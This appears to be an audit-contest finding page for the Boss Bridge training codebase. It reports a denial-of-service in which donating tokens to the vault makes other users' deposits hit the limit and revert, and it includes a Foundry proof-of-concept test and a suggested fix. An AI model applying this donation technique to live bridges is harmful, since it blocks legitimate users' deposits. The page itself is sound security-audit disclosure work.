First Flight #4: Boss Bridge
First Flight #4
Beginner FriendlyFoundryBridge
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Malicious actor can DOS attack depositTokensToL2

Cryptor

Summary

Malicious actor can DOS attack depositTokensToL2

Vulnerability Details

The function depositTokensToL2 has a deposit limit that limits the amount of funds that a user can deposit into the bridges shown here

if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {
revert L1BossBridge__DepositLimitReached();
}

https://github.com/Cyfrin/2023-11-Boss-Bridge/blob/1b33f63aef5b6b06acd99d49da65e1c71b40a4f7/src/L1BossBridge.sol#L71

The problem is that it uses the contract balance to track this invariant, opening the door for a malicious actor to make a donation to the vault contract to ensure that the deposit limit is reached causing a potential victim's harmless deposit to unexpectedly revert. See modified foundry test below:

function testUserCannotDepositBeyondLimit() public {
vm.startPrank(user2);
uint DOSamount = 20;
deal(address(token), user2, DOSamount);
token.approve(address(token), 20);
token.transfer(address(vault), 20);
vm.stopPrank();
vm.startPrank(user);
uint256 amount = tokenBridge.DEPOSIT_LIMIT() - 9;
deal(address(token), user, amount);
token.approve(address(tokenBridge), amount);
vm.expectRevert(L1BossBridge.L1BossBridge__DepositLimitReached.selector);
tokenBridge.depositTokensToL2(user, userInL2, amount);
vm.stopPrank();
}

Impact

User will not be able to deposit token to the bridge in some situations

Tools Used

Foundry

Recommendations

Use a mapping to track the deposit limit of each use instead of using the contract balance

Updates

Lead Judging Commences

0xnevi Lead Judge
over 1 year ago
0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): DoS deposits via DEPOSIT_LIMIT

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.